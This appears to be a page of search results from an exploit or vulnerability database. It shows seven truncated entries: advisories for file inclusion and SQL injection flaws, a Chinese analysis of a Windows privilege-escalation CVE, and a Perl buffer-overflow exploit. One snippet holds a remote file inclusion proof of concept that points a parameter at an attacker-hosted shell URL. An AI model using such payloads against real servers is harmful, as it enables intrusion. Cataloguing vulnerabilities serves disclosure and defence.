7 matches found
Mesop has a local file Inclusion via static file serving functionality
A vulnerability has been discovered and fixed in Mesop that could potentially allow unauthorized access to files on the server hosting the Mesop application. The vulnerability was related to insufficient input validation in a specific endpoint. This could have allowed an attacker to access files...
Microsoft Windows Kernel 'Win32k.sys' Local Privilege Escalation Vulnerability(CVE-2018-8120)
作者:bigric3 作者博客: 5月15日ESET发文其在3月份捕获了一个 pdf远程代码执行(cve-2018-4990)+windows本地权限提升(cve-2018-8120)的样本。ESET发文后,我从vt上下载了这样一份样本()。初步逆向,大致明确如外界所传,该漏洞处于开发测试阶段,不慎被上传到了公网样本检测的网上,由ESET捕获并提交微软和adobe修补。测试特征字符串如下 定位样本中关键的代码并调试分析...
Neudimenxion CMS SQL Injection
========================================================= Exploit Title : Neudimenxion CMS SQL Injection Date : 17 July 2011 Author : Netrondoank aka netron Platform/Tested on: Linux myweb : http://www.ilmuhacker.org Version : none Software Link: : http://www.neudimenxion.com/ dork : "CMS ©...
outreach project tool 1.2.6 - Remote File Inclusion
outreach project tool 1.2.6 - Remote File Inclusion Discovered by cr4wl3r \ Indonesian Hacker OPT Outreach Project Tool PoC : http://server/path/forums/ForumInclude/index.php?CRMpath=http://attacker/shell.txt??? Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang...
Joomla! Component IRCm Basic - SQL Injection
Joomla Component comircmbasic SQL injection vulnerability Author : kaMtiEz [email protected] Homepage : http://www.indonesiancoder.com Date : September 27, 2009 Hello My Name Is : . | | / / ||\ / | |/ /\ \ / \ / \ \ || \ / | / / Y \ | | || / / || \ /| /| |/ / \ / / / / / -=- INDONESIAN...
racer-overflow.txt
!/usr/bin/perl Credit's to n00b. Racer v0.5.3 beta 5 12-03-07 remote exploit. Racer is also prone to a buffer over flow in the server and client.Automatically the game open's Udp port 26000 and is waiting for a msg buffer. If we send an overly long buffer we are able to Control the eip register a...
# MHG Security Team ---Rumble 1.02 version Remote File Inc.
Milli-Harekat Advisory www.milli-harekat.org Rumble = 1.02 version - Remote File Include Vulnerabilities Risk : high Class: Remote Script : Rumble 1.02 version Msn : erne at ernealizm dot com Credits : ERNE Thanks : DjReMix,Thebekir,SpC-x,Eskobar,Blackened,Poizonbox,Dilejyoner And ALL MHG USERS...